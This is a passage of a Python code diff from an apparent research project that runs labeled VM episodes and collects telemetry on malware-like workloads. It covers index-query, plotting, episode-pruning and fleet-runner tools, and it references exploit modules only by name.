p.add_argument("--sort", choices=("time", "size", "host"), default="time")
|
||||
p.add_argument("--count-by",
|
||||
choices=("host_id", "schema_version"),
|
||||
help="instead of printing rows, group + count by this field")
|
||||
p.add_argument("--limit", type=int, default=0,
|
||||
help="cap output rows (0 = all)")
|
||||
args = p.parse_args(argv)
|
||||
|
||||
path = Path(args.index)
|
||||
if not path.exists():
|
||||
print(f"no index at {path}", file=sys.stderr)
|
||||
return 2
|
||||
|
||||
since = _parse_since(args.since) if args.since else None
|
||||
until = _parse_since(args.until) if args.until else None
|
||||
|
||||
rows: list[dict] = []
|
||||
with path.open() as f:
|
||||
for line in f:
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
try:
|
||||
row = json.loads(line)
|
||||
except json.JSONDecodeError:
|
||||
continue
|
||||
if args.host and row.get("host_id") != args.host:
|
||||
continue
|
||||
if since or until:
|
||||
t = _row_time(row)
|
||||
if t is None:
|
||||
continue
|
||||
if since and t < since:
|
||||
continue
|
||||
if until and t >= until:
|
||||
continue
|
||||
rows.append(row)
|
||||
|
||||
if args.count_by:
|
||||
counts = Counter(r.get(args.count_by, "<missing>") for r in rows)
|
||||
for k, n in counts.most_common():
|
||||
print(f"{n:>6} {k}")
|
||||
return 0
|
||||
|
||||
sort_keys = {
|
||||
"time": lambda r: r.get("received_at_wall", ""),
|
||||
"size": lambda r: r.get("size_bytes", 0),
|
||||
"host": lambda r: r.get("host_id", ""),
|
||||
}
|
||||
rows.sort(key=sort_keys[args.sort])
|
||||
if args.limit:
|
||||
rows = rows[-args.limit:] if args.sort != "size" else rows[:args.limit]
|
||||
|
||||
# Print TSV-ish for quick eyeballing + downstream pipe-friendliness.
|
||||
print("received_at_wall\thost_id\tepisode_id\tsize_bytes\tschema_version\tsha256")
|
||||
for r in rows:
|
||||
print("\t".join(str(r.get(k, "")) for k in
|
||||
("received_at_wall", "host_id", "episode_id",
|
||||
"size_bytes", "schema_version", "sha256")))
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
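The `--since` / `--until` filter in `main` keeps rows with `since <= t < until` and drops rows whose timestamp cannot be parsed whenever a time filter is active. Here is a small sketch of that window logic in isolation; `in_window` is a hypothetical name and the timestamps are made up for illustration.

```python
from __future__ import annotations

from datetime import datetime, timezone


def in_window(t: datetime | None,
              since: datetime | None,
              until: datetime | None) -> bool:
    """Half-open window test: since <= t < until. Hypothetical helper."""
    if since is None and until is None:
        return True       # no time filter requested
    if t is None:
        return False      # unparseable timestamp: dropped when filtering
    if since is not None and t < since:
        return False
    if until is not None and t >= until:
        return False
    return True


day = datetime(2026, 4, 30, tzinfo=timezone.utc)
next_day = datetime(2026, 5, 1, tzinfo=timezone.utc)
print(in_window(day, day, next_day))       # True: lower bound is inclusive
print(in_window(next_day, day, next_day))  # False: upper bound is exclusive
```

The half-open convention means consecutive day-sized queries neither overlap nor miss a row that lands exactly on midnight.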
|
|
@@ -1,8 +1,19 @@
 """Plot a single episode's envelope.
 
-Reads ``telemetry-proc.jsonl`` and ``labels.jsonl`` from an episode directory
-and renders a 3-panel chart: CPU%, RSS, IO write rate, with phase bands
-underneath.
+Renders a multi-panel chart from whatever telemetry the episode dir
+contains, with phase bands underneath each panel:
+
+  panel 1 — host /proc CPU%        (source 1, always)
+  panel 2 — host /proc RSS         (source 1, always)
+  panel 3 — host /proc IO write    (source 1, always)
+  panel 4 — QMP block I/O ops      (source 2, if telemetry-qmp.jsonl)
+  panel 5 — perf IPC + miss-rate   (source 3, if telemetry-perf.jsonl)
+  panel 6 — bridge pcap pkts/s     (source 4, if netflow.jsonl)
+  panel 7 — guest agent CPU/load   (source 5, if telemetry-guest.jsonl)
+
+Missing sources are silently skipped — a Tier-1 episode dir with only
+proc telemetry still gets the original 3-panel plot. A Tier-3+ run
+with all five sources gets the full stack on a shared time axis.
 
 Two modes:
 
|
|
@@ -103,21 +114,77 @@ def main() -> int:
         end = labels[i + 1]["t_mono_ns"] / 1e9 if i + 1 < len(labels) else end_t
         spans.append((start, end, lbl["phase"]))
 
-    fig, axes = plt.subplots(3, 1, figsize=(13, 8), sharex=True)
+    # Discover optional sources.
+    qmp_rows = _load_jsonl(d / "telemetry-qmp.jsonl") if (d / "telemetry-qmp.jsonl").exists() else []
+    perf_rows = _load_jsonl(d / "telemetry-perf.jsonl") if (d / "telemetry-perf.jsonl").exists() else []
+    netflow_rows = _load_jsonl(d / "netflow.jsonl") if (d / "netflow.jsonl").exists() else []
+    guest_rows = _load_jsonl(d / "telemetry-guest.jsonl") if (d / "telemetry-guest.jsonl").exists() else []
 
-    axes[0].plot(t, cpu_pct, color="#222222", linewidth=1.0)
-    axes[0].set_ylabel("CPU %")
-    axes[0].set_ylim(-3, 110)
-    axes[0].grid(alpha=0.25)
+    panels: list[tuple[str, callable]] = []  # (ylabel, plot_fn(ax))
+    panels.append(("CPU % (proc)", lambda ax: (
+        ax.plot(t, cpu_pct, color="#222222", linewidth=1.0),
+        ax.set_ylim(-3, 110),
+    )))
+    panels.append(("RSS (MiB)", lambda ax: ax.plot(t, rss_mib, color="#222222", linewidth=1.0)))
+    panels.append(("IO write (KiB/s)", lambda ax: ax.plot(t, io_kb_s, color="#222222", linewidth=1.0)))
 
-    axes[1].plot(t, rss_mib, color="#222222", linewidth=1.0)
-    axes[1].set_ylabel("RSS (MiB)")
-    axes[1].grid(alpha=0.25)
+    if qmp_rows:
+        qt = [r["t_mono_ns"] / 1e9 for r in qmp_rows]
+        # Sum block I/O ops across devices.
+        wr_ops = []
+        rd_ops = []
+        for r in qmp_rows:
+            bs = r.get("blockstats") or {}
+            wr_ops.append(sum(d.get("wr_ops", 0) for d in bs.values()))
+            rd_ops.append(sum(d.get("rd_ops", 0) for d in bs.values()))
+        panels.append(("QMP block ops (cum)", lambda ax: (
+            ax.plot(qt, wr_ops, color="#cc4444", linewidth=1.0, label="wr_ops"),
+            ax.plot(qt, rd_ops, color="#4488cc", linewidth=1.0, label="rd_ops"),
+            ax.legend(loc="upper left", fontsize=8),
+        )))
 
-    axes[2].plot(t, io_kb_s, color="#222222", linewidth=1.0)
-    axes[2].set_ylabel("IO write (KiB/s)")
-    axes[2].set_xlabel("time (s)")
-    axes[2].grid(alpha=0.25)
+    if perf_rows:
+        pt = [r["t_mono_ns"] / 1e9 for r in perf_rows]
+        ipc = [r.get("ipc") or 0 for r in perf_rows]
+        miss = [r.get("cache_miss_rate") or 0 for r in perf_rows]
+        panels.append(("perf IPC / miss-rate", lambda ax: (
+            ax.plot(pt, ipc, color="#222222", linewidth=1.0, label="IPC"),
+            ax.plot(pt, miss, color="#cc4444", linewidth=1.0, label="cache miss rate"),
+            ax.legend(loc="upper right", fontsize=8),
+        )))
+
+    if netflow_rows:
+        nt = [r["t_mono_ns"] / 1e9 for r in netflow_rows]
+        pkts = [(r.get("pkts_in", 0) + r.get("pkts_out", 0)) for r in netflow_rows]
+        synf = [r.get("syn_count", 0) for r in netflow_rows]
+        panels.append(("bridge pkts / SYNs (per 100 ms)", lambda ax: (
+            ax.plot(nt, pkts, color="#222222", linewidth=1.0, label="pkts"),
+            ax.plot(nt, synf, color="#cc4444", linewidth=1.0, label="syn"),
+            ax.legend(loc="upper right", fontsize=8),
+        )))
+
+    if guest_rows:
+        gt = [r["t_mono_ns"] / 1e9 for r in guest_rows]
+        load1 = [(r.get("load_1m_5m_15m") or [0])[0] for r in guest_rows]
+        mem_used = [
+            ((r.get("mem_total_bytes") or 0) - (r.get("mem_available_bytes") or 0)) / (1024 * 1024)
+            for r in guest_rows
+        ]
+        panels.append(("guest load1 / mem_used (MiB)", lambda ax: (
+            ax.plot(gt, load1, color="#222222", linewidth=1.0, label="load1"),
+            ax.twinx().plot(gt, mem_used, color="#4488cc", linewidth=1.0, label="mem MiB"),
+        )))
+
+    n = len(panels)
+    fig, axes = plt.subplots(n, 1, figsize=(13, 2 + 1.6 * n), sharex=True)
+    if n == 1:
+        axes = [axes]
+
+    for ax, (ylabel, plot_fn) in zip(axes, panels):
+        plot_fn(ax)
+        ax.set_ylabel(ylabel)
+        ax.grid(alpha=0.25)
+    axes[-1].set_xlabel("time (s)")
 
     for ax in axes:
         for start, end, phase in spans:
|
||||
|
|
|
|||
364
tools/prune_episodes.py
Normal file
|
|
@@ -0,0 +1,364 @@
|
|||
"""``cis490-prune`` — retroactively filter low-quality episodes from
|
||||
the receiver's dataset.
|
||||
|
||||
The signals that mark an episode as low-quality:
|
||||
|
||||
  no-sample            meta.sample is null. Pre-Sample-propagation code
                       (commit a193d17 or earlier) ran the v1 yes-loop
                       fallback regardless of what the fleet picked, so
                       post-infection variety isn't recorded in meta.

  no-workload-events   events.jsonl has zero workload_* rows.
                       Pre-audit-trail code (commit d86502d or earlier)
                       ran with no event emission from VMLoadController,
                       so we can't tell whether the workload actually
                       fired.

  workload-failed      events.jsonl contains a workload_failed row.
                       SerialClient.run() raised mid-phase; the labels
                       and telemetry don't match what the orchestrator
                       was supposed to be doing.

  workload-silent      workload_killed event during the dormant phase
                       has pre_kill_probe.yes == "0", meaning no
                       ``yes``-loop process was running when we tried
                       to kill it. This is the elliott-lab fingerprint:
                       the schedule walked but nothing fired in-guest.

  flat-cpu             The spread between per-phase median /proc CPU%
                       values is under 5 percentage points. A model
                       trained on these episodes can't distinguish
                       phases.
|
||||
|
||||
Usage:
|
||||
cis490-prune # dry-run summary, no changes
|
||||
cis490-prune --reason no-sample # filter to one signal
|
||||
cis490-prune --archive # mv flagged episodes to
|
||||
# /var/lib/cis490/episodes-archive/
|
||||
cis490-prune --delete # rm flagged episodes + index rows
|
||||
|
||||
Run on the receiver host, where /var/lib/cis490/ lives. Run as root:
the episode store is owned by the cis490 user with mode 0640.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import io
|
||||
import json
|
||||
import os
|
||||
import shutil
|
||||
import statistics
|
||||
import subprocess
|
||||
import sys
|
||||
import tarfile
|
||||
import tempfile
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
from typing import Iterator
|
||||
|
||||
|
||||
_REASONS = (
|
||||
"no-sample",
|
||||
"no-workload-events",
|
||||
"workload-failed",
|
||||
"workload-silent",
|
||||
"flat-cpu",
|
||||
)
|
||||
|
||||
|
||||
@dataclass
|
||||
class EpisodeQuality:
|
||||
host_id: str
|
||||
episode_id: str
|
||||
tar_path: Path
|
||||
size_bytes: int
|
||||
reasons: list[str] = field(default_factory=list)
|
||||
sample_name: str | None = None
|
||||
module_name: str | None = None
|
||||
|
||||
@property
|
||||
def fake(self) -> bool:
|
||||
return bool(self.reasons)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# tarball introspection
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _read_jsonl_from_tar(tar: tarfile.TarFile, name_suffix: str) -> list[dict]:
|
||||
"""Extract a JSONL member by name suffix (e.g. 'events.jsonl')."""
|
||||
for m in tar.getmembers():
|
||||
if m.name.endswith(name_suffix) and m.isfile():
|
||||
f = tar.extractfile(m)
|
||||
if f is None:
|
||||
return []
|
||||
text = f.read().decode("utf-8", errors="replace")
|
||||
return [json.loads(line) for line in text.splitlines() if line.strip()]
|
||||
return []
|
||||
|
||||
|
||||
def _read_meta_from_tar(tar: tarfile.TarFile) -> dict:
|
||||
for m in tar.getmembers():
|
||||
if m.name.endswith("meta.json") and m.isfile():
|
||||
f = tar.extractfile(m)
|
||||
if f is None:
|
||||
return {}
|
||||
return json.loads(f.read().decode("utf-8"))
|
||||
return {}
|
||||
|
||||
|
||||
def _decompress_zstd(zst_path: Path) -> bytes:
|
||||
"""Pure stdlib doesn't have zstd; shell out (already a project dep
|
||||
— install scripts require it)."""
|
||||
p = subprocess.run(
|
||||
["zstd", "-q", "-d", "--stdout", str(zst_path)],
|
||||
check=True, capture_output=True,
|
||||
)
|
||||
return p.stdout
|
||||
|
||||
|
||||
def classify_episode(tar_zst: Path, host_id: str, episode_id: str) -> EpisodeQuality:
|
||||
"""Open the tarball, scan meta + events + telemetry, return a
|
||||
quality verdict. Each signal is independent — an episode can hit
|
||||
multiple reasons (e.g. no-sample + workload-silent)."""
|
||||
q = EpisodeQuality(
|
||||
host_id=host_id,
|
||||
episode_id=episode_id,
|
||||
tar_path=tar_zst,
|
||||
size_bytes=tar_zst.stat().st_size,
|
||||
)
|
||||
|
||||
try:
|
||||
raw = _decompress_zstd(tar_zst)
|
||||
except (subprocess.CalledProcessError, OSError) as e:
|
||||
q.reasons.append(f"unreadable: {e}"[:80])
|
||||
return q
|
||||
|
||||
with tarfile.open(fileobj=io.BytesIO(raw)) as tar:
|
||||
meta = _read_meta_from_tar(tar)
|
||||
events = _read_jsonl_from_tar(tar, "events.jsonl")
|
||||
proc = _read_jsonl_from_tar(tar, "telemetry-proc.jsonl")
|
||||
labels = _read_jsonl_from_tar(tar, "labels.jsonl")
|
||||
|
||||
sample = meta.get("sample")
|
||||
if sample is None:
|
||||
q.reasons.append("no-sample")
|
||||
else:
|
||||
q.sample_name = sample.get("name")
|
||||
|
||||
exploit = meta.get("exploit")
|
||||
if exploit is not None:
|
||||
q.module_name = exploit.get("module_name")
|
||||
|
||||
workload_events = [e for e in events if str(e.get("event", "")).startswith("workload_")]
|
||||
if not workload_events:
|
||||
q.reasons.append("no-workload-events")
|
||||
if any(e.get("event") == "workload_failed" for e in events):
|
||||
q.reasons.append("workload-failed")
|
||||
|
||||
# workload-silent: dormant transition's probe shows no `yes` proc.
|
||||
for e in events:
|
||||
if e.get("event") != "workload_killed":
|
||||
continue
|
||||
if e.get("phase") != "dormant":
|
||||
continue
|
||||
probe = e.get("pre_kill_probe")
|
||||
if isinstance(probe, dict) and probe.get("yes") == "0":
|
||||
q.reasons.append("workload-silent")
|
||||
break
|
||||
|
||||
# flat-cpu: bucket /proc CPU% by phase, check inter-phase spread.
|
||||
if proc and labels:
|
||||
clk_tck = os.sysconf("SC_CLK_TCK")
|
||||
|
||||
def phase_at(t_ns: int) -> str:
|
||||
cur = "(pre)"
|
||||
for l in labels:
|
||||
if l["t_mono_ns"] <= t_ns:
|
||||
cur = l["phase"]
|
||||
else:
|
||||
break
|
||||
return cur
|
||||
|
||||
per_phase: dict[str, list[float]] = {}
|
||||
prev = None
|
||||
for r in proc:
|
||||
if prev is not None:
|
||||
dt = (r["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
|
||||
if dt > 0:
|
||||
djiff = (r["cpu_user_jiffies"] + r["cpu_sys_jiffies"]) - \
|
||||
(prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"])
|
||||
pct = 100.0 * (djiff / clk_tck) / dt
|
||||
per_phase.setdefault(phase_at(r["t_mono_ns"]), []).append(pct)
|
||||
prev = r
|
||||
if per_phase:
|
||||
medians = [statistics.median(v) for v in per_phase.values() if v]
|
||||
if medians and (max(medians) - min(medians)) < 5.0:
|
||||
q.reasons.append("flat-cpu")
|
||||
|
||||
return q
|
||||
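The flat-cpu signal in `classify_episode` converts consecutive `/proc` samples into a CPU percentage, `100 * (delta_jiffies / CLK_TCK) / delta_seconds`, then compares per-phase medians against a 5-point spread. The sketch below works that arithmetic through with made-up numbers. `cpu_pct` is a hypothetical helper, and `clk_tck=100` is an assumption for the example (the code above reads the real value from `os.sysconf`).

```python
from __future__ import annotations

import statistics


def cpu_pct(prev: dict, cur: dict, clk_tck: int = 100) -> float | None:
    """CPU% between two /proc samples, or None if time did not advance."""
    dt = (cur["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
    if dt <= 0:
        return None
    djiff = (cur["cpu_user_jiffies"] + cur["cpu_sys_jiffies"]) - \
            (prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"])
    return 100.0 * (djiff / clk_tck) / dt


# 50 jiffies at 100 Hz is 0.5 s of CPU time over a 1 s interval.
prev = {"t_mono_ns": 0, "cpu_user_jiffies": 0, "cpu_sys_jiffies": 0}
cur = {"t_mono_ns": 1_000_000_000, "cpu_user_jiffies": 40, "cpu_sys_jiffies": 10}
print(cpu_pct(prev, cur))  # 50.0

# Illustrative per-phase samples: medians 2.0 and 5.0, spread 3.0 < 5.0.
per_phase = {"dormant": [1.0, 2.0, 3.0], "active": [4.0, 5.0, 6.0]}
medians = [statistics.median(v) for v in per_phase.values()]
is_flat = (max(medians) - min(medians)) < 5.0
print(is_flat)  # True
```

Using medians rather than means keeps a single spiky sample from masking an otherwise flat phase.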
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Index walking + actions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def walk_index(index_path: Path, episodes_root: Path) -> Iterator[tuple[dict, Path]]:
|
||||
if not index_path.exists():
|
||||
return
|
||||
for line in index_path.read_text().splitlines():
|
||||
if not line.strip():
|
||||
continue
|
||||
try:
|
||||
row = json.loads(line)
|
||||
except json.JSONDecodeError:
|
||||
continue
|
||||
host = row.get("host_id", "")
|
||||
ep = row.get("episode_id", "")
|
||||
if not host or not ep:
|
||||
continue
|
||||
tar = episodes_root / host / f"{ep}.tar.zst"
|
||||
if not tar.exists():
|
||||
continue
|
||||
yield row, tar
|
||||
|
||||
|
||||
def apply_action(
    quals: list[EpisodeQuality],
    *,
    action: str,
    archive_root: Path,
    index_path: Path,
) -> None:
    """Carry out --delete or --archive on flagged episodes + drop
    matching rows from index.jsonl. Atomic-ish: index rewrite is
    single-shot after all tarballs are handled."""
    if action not in ("delete", "archive"):
        return
    flagged_ids = {q.episode_id for q in quals if q.fake}
    if not flagged_ids:
        return

    if action == "archive":
        archive_root.mkdir(parents=True, exist_ok=True)
    for q in quals:
        if not q.fake:
            continue
        if action == "archive":
            target = archive_root / q.host_id
            target.mkdir(parents=True, exist_ok=True)
            shutil.move(str(q.tar_path), target / q.tar_path.name)
        elif action == "delete":
            q.tar_path.unlink(missing_ok=True)

    if index_path.exists():
        kept = []
        for line in index_path.read_text().splitlines():
            try:
                row = json.loads(line)
            except json.JSONDecodeError:
                kept.append(line)
                continue
            if row.get("episode_id") in flagged_ids:
                continue
            kept.append(line)
        # Rewrite via tempfile + replace so a crash mid-write doesn't
        # corrupt the live index.
        tmp = index_path.with_suffix(".jsonl.partial")
        tmp.write_text("\n".join(kept) + ("\n" if kept else ""))
        os.replace(tmp, index_path)


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------


def main(argv: list[str] | None = None) -> int:
    p = argparse.ArgumentParser(prog="cis490-prune")
    p.add_argument("--episodes-root", type=Path,
                   default=Path("/var/lib/cis490/episodes"))
    p.add_argument("--index", type=Path,
                   default=Path("/var/lib/cis490/index.jsonl"))
    p.add_argument("--archive-root", type=Path,
                   default=Path("/var/lib/cis490/episodes-archive"))
    p.add_argument("--reason", action="append", choices=_REASONS,
                   help="Only flag episodes matching this reason. Repeat "
                        "to OR multiple. Default: all reasons.")
    p.add_argument("--host", help="Only consider episodes from this host_id")
    action = p.add_mutually_exclusive_group()
    action.add_argument("--delete", action="store_true",
                        help="Remove flagged tarballs + drop their index rows")
    action.add_argument("--archive", action="store_true",
                        help="Move flagged tarballs to --archive-root + drop index rows")
    p.add_argument("--json", action="store_true",
                   help="Machine-readable output instead of summary")
    args = p.parse_args(argv)

    if not args.episodes_root.exists():
        print(f"no episodes dir at {args.episodes_root}", file=sys.stderr)
        return 2

    selected_reasons = set(args.reason or _REASONS)

    quals: list[EpisodeQuality] = []
    for row, tar in walk_index(args.index, args.episodes_root):
        if args.host and row["host_id"] != args.host:
            continue
        q = classify_episode(tar, row["host_id"], row["episode_id"])
        # Only mark "fake" if at least one of the selected reasons hits.
        q.reasons = [r for r in q.reasons if r in selected_reasons]
        quals.append(q)

    flagged = [q for q in quals if q.fake]
    kept = [q for q in quals if not q.fake]

    if args.json:
        print(json.dumps({
            "scanned": len(quals),
            "flagged": len(flagged),
            "kept": len(kept),
            "by_reason": {
                r: sum(1 for q in flagged if r in q.reasons) for r in _REASONS
            },
            "flagged_episodes": [
                {
                    "host": q.host_id,
                    "episode": q.episode_id,
                    "size_bytes": q.size_bytes,
                    "reasons": q.reasons,
                    "sample": q.sample_name,
                    "module": q.module_name,
                } for q in flagged
            ],
        }, indent=2))
    else:
        print(f"scanned: {len(quals)} flagged: {len(flagged)} kept: {len(kept)}")
        if flagged:
            print()
            print(f"{'host':<14} {'episode':<28} {'size':>9} reasons")
            for q in flagged:
                print(f"{q.host_id:<14} {q.episode_id:<28} {q.size_bytes:>9} "
                      f"{','.join(q.reasons)}")
        if not (args.delete or args.archive):
            print()
            print("dry-run only. Re-run with --archive (safer) or --delete.")

    if args.delete or args.archive:
        action = "delete" if args.delete else "archive"
        apply_action(
            quals,
            action=action,
            archive_root=args.archive_root,
            index_path=args.index,
        )
        # With --json, keep stdout a single parseable JSON document and send
        # the human-readable confirmation to stderr instead.
        print(f"\n{action}d {len(flagged)} episodes",
              file=sys.stderr if args.json else sys.stdout)

    return 0 if not flagged else 1


if __name__ == "__main__":
    sys.exit(main())
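The `flat-cpu` check in the prune tool converts jiffy deltas into CPU percent and flags an episode when the per-phase medians differ by less than 5 points. A minimal sketch of that arithmetic on synthetic rows might look like the following. The helper names `cpu_percent` and `is_flat` and the sample numbers are illustrative assumptions, not part of the tool, and `clk_tck` is passed in rather than read from `os.sysconf`.

```python
from __future__ import annotations

import statistics


def cpu_percent(prev: dict, cur: dict, clk_tck: int) -> float | None:
    """CPU% of one process between two /proc samples; None if dt <= 0."""
    dt = (cur["t_mono_ns"] - prev["t_mono_ns"]) / 1e9
    if dt <= 0:
        return None
    # user + sys jiffies consumed between the two samples
    djiff = (cur["cpu_user_jiffies"] + cur["cpu_sys_jiffies"]) - (
        prev["cpu_user_jiffies"] + prev["cpu_sys_jiffies"]
    )
    # jiffies / clk_tck = CPU seconds; divide by wall seconds for utilisation
    return 100.0 * (djiff / clk_tck) / dt


def is_flat(per_phase: dict[str, list[float]], threshold: float = 5.0) -> bool:
    """True when every phase has roughly the same median CPU%."""
    medians = [statistics.median(v) for v in per_phase.values() if v]
    return bool(medians) and (max(medians) - min(medians)) < threshold


# Synthetic example: 50 jiffies over 1 s at 100 ticks per second.
prev = {"t_mono_ns": 0, "cpu_user_jiffies": 100, "cpu_sys_jiffies": 20}
cur = {"t_mono_ns": 1_000_000_000, "cpu_user_jiffies": 140, "cpu_sys_jiffies": 30}
print(cpu_percent(prev, cur, clk_tck=100))
```

An episode whose `clean` and `infected_running` phases both sit near the same median (for instance around 20%) would be reported as flat by `is_flat`, which matches the "well-labeled but information-less" case the tool is meant to catch.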
109
tools/run_fleet.py
Normal file
@@ -0,0 +1,109 @@
"""``cis490-fleet``: run as many concurrent labeled episodes as the
host can handle, drawing samples from the manifest.

Modes:

  --capacity          Print the resource calculation and exit. No VMs spawned.
  --waves N           Run N waves of episodes (one wave = max_concurrent
                      episodes, each in its own slot). Default: 1.
  --max-concurrent N
                      Cap concurrency below the auto-detected ceiling.
"""

from __future__ import annotations

import argparse
import json
import logging
import os
import signal
import sys
from pathlib import Path

# Allow running as a script.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))

from exploits.modules import load_module_configs  # noqa: E402
from orchestrator.fleet import (  # noqa: E402
    FleetConfig, FleetRunner, capacity_report, detect_capacity,
)
from samples.manifest import SampleManifest  # noqa: E402


def main(argv: list[str] | None = None) -> int:
    p = argparse.ArgumentParser(prog="cis490-fleet")
    p.add_argument("--capacity", action="store_true")
    p.add_argument("--waves", type=int, default=1)
    p.add_argument("--max-concurrent", type=int, default=None)
    p.add_argument("--manifest",
                   default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"))
    p.add_argument("--modules-dir",
                   default=str(Path(__file__).resolve().parent.parent / "exploits" / "modules"))
    p.add_argument("--data-root", default="data")
    p.add_argument("--host-id", default=os.environ.get("FLEET_HOST_ID") or os.uname().nodename)
    p.add_argument("--ram-per-vm-mib", type=int, default=320)
    p.add_argument("--require-real-samples", action="store_true")
    p.add_argument("--force-tier2", action="store_true",
                   help="Skip Tier 3 even when msfrpcd is reachable")
    p.add_argument("--log-level", default="INFO")
    args = p.parse_args(argv)

    logging.basicConfig(
        level=getattr(logging, args.log_level.upper(), logging.INFO),
        format="%(asctime)s %(levelname)s %(name)s %(message)s",
    )

    if args.capacity:
        print(capacity_report())
        return 0

    manifest = SampleManifest.load(args.manifest)
    repo_root = Path(__file__).resolve().parent.parent
    modules_dir = Path(args.modules_dir)
    modules = load_module_configs(modules_dir) if modules_dir.exists() else {}

    cfg = FleetConfig(
        host_id=args.host_id,
        repo_root=repo_root,
        data_root=Path(args.data_root).resolve(),
        manifest=manifest,
        modules=modules,
        ram_per_vm_mib=args.ram_per_vm_mib,
        max_concurrent_override=args.max_concurrent,
        require_real_samples=args.require_real_samples,
        force_tier2=args.force_tier2,
    )

    runner = FleetRunner(cfg)

    def _stop(signum, frame):  # noqa: ARG001
        runner.stop()
    signal.signal(signal.SIGTERM, _stop)
    signal.signal(signal.SIGINT, _stop)

    result = runner.run(episodes=args.waves)

    print(json.dumps({
        "host_id": args.host_id,
        "capacity": result.capacity.to_dict(),
        "modules_loaded": sorted(modules.keys()),
        "slots": [
            {
                "slot": s.slot,
                "sample": s.sample_name,
                "sample_kind": s.sample_kind,
                "tier": s.tier,
                "module": s.module_name,
                "rc": s.rc,
                "duration_s": s.duration_s,
                "error": s.error,
            } for s in result.slots
        ],
        "total_duration_s": result.total_duration_s,
    }, indent=2))

    return 0 if all(s.rc == 0 for s in result.slots) else 1


if __name__ == "__main__":
    sys.exit(main())
@@ -27,7 +27,9 @@ from pathlib import Path
 sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
 sys.path.insert(0, str(Path(__file__).resolve().parent))

+from collectors import qmp  # noqa: E402
 from orchestrator.episode import EpisodeConfig, EpisodeRunner  # noqa: E402
+from samples.manifest import SampleManifest  # noqa: E402
 from vm_load_controller import VMLoadController  # noqa: E402
 from vm_serial import SerialClient  # noqa: E402

@@ -69,7 +71,17 @@ def main() -> int:
     parser.add_argument("--interval-ms", type=int, default=100)
     parser.add_argument(
         "--run-dir",
-        default="/tmp/cis490-vm",
+        # Per-slot defaults so the fleet runner's parallel calls don't
+        # collide on the same /tmp dir (which would have rmtree'd each
+        # other's pidfiles mid-boot; see CIS490 history). Resolution
+        # order:
+        #   1) explicit --run-dir CLI flag
+        #   2) RUN_DIR env (set by the fleet runner)
+        #   3) /tmp/cis490-vm-<SLOT> (SLOT defaults to 0)
+        default=(
+            os.environ.get("RUN_DIR")
+            or f"/tmp/cis490-vm-{os.environ.get('SLOT', '0')}"
+        ),
         help="QEMU run dir (sockets + pidfile go here)",
     )
     parser.add_argument(
@@ -83,6 +95,16 @@ def main() -> int:
         default=120.0,
         help="how long to wait for serial login prompt",
     )
+    parser.add_argument(
+        "--sample",
+        default=os.environ.get("SAMPLE_NAME"),
+        help="Pick a workload profile from the manifest by name. Fleet runner "
+             "passes this via SAMPLE_NAME env. If unset, runs the v1 yes-loop.",
+    )
+    parser.add_argument(
+        "--manifest",
+        default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
+    )
     args = parser.parse_args()

     logging.basicConfig(
@@ -93,6 +115,17 @@ def main() -> int:

     repo_root = Path(__file__).resolve().parent.parent
     launcher = repo_root / "vm" / "launch_demo.sh"
+
+    # Resolve sample if requested.
+    sample = None
+    if args.sample:
+        manifest = SampleManifest.load(args.manifest)
+        sample = next((s for s in manifest.samples if s.name == args.sample), None)
+        if sample is None:
+            log.error("sample %r not in manifest %s", args.sample, args.manifest)
+            return 2
+        log.info("using sample=%s profile=%s kind=%s",
+                 sample.name, sample.profile, sample.kind)
     run_dir = Path(args.run_dir)
     # Wipe any stale sockets/pidfile from a previous run.
     if run_dir.exists():
@@ -137,9 +170,42 @@ def main() -> int:
         serial.connect()
         serial.login(boot_timeout_s=args.boot_timeout)

-        controller = VMLoadController(serial)
+        # Take a savevm AFTER the guest is fully up but BEFORE we
+        # start any workload. EpisodeConfig.revert_at_{start,end} use
+        # this snapshot for inter-episode reverts (the snapshot lives
+        # in the qcow2's per-VM-process overlay since launch_demo.sh
+        # runs with snapshot=on, so it's discarded with the VM).
+        # Without this step, loadvm would target a snapshot that
+        # doesn't exist and silently emit snapshot_revert_failed.
+        qmp_sock = run_dir / "qmp.sock"
+        if qmp_sock.exists():
+            try:
+                _qmp = qmp.QMPClient(qmp_sock)
+                _qmp.connect()
+                try:
+                    out = _qmp.savevm("baseline-v1")
+                    log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
+                finally:
+                    _qmp.close()
+            except Exception as e:
+                log.warning("savevm failed; revert_at_start unusable: %s", e)
+
+        # Bind the controller to the runner's event log so workload
+        # success/failure shows up alongside phase_transition events.
+        # Sample also goes into EpisodeConfig below so meta.sample
+        # records what was supposed to run.
+        runner_for_emit = {"runner": None}
+        controller = VMLoadController(
+            serial,
+            sample=sample,
+            emit_event=lambda ev, **kw: (
+                runner_for_emit["runner"].emit_event(ev, **kw)
+                if runner_for_emit["runner"] else None
+            ),
+        )
         controller.setup()

+        agent_sock = run_dir / "agent.sock"
         cfg = EpisodeConfig(
             target_pid=qemu_pid,
             duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
@@ -148,9 +214,18 @@ def main() -> int:
             phase_schedule=DEFAULT_SCHEDULE,
             image_name="alpine-3.21-cloudinit",
             snapshot_name="baseline-v1",
+            qmp_socket=qmp_sock if qmp_sock.exists() else None,
+            guest_agent_socket=agent_sock if agent_sock.exists() else None,
+            bridge_iface=os.environ.get("BRIDGE") or None,
+            sample=sample,
         )

-        result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()
+        runner = EpisodeRunner(cfg, on_phase=controller.set_phase)
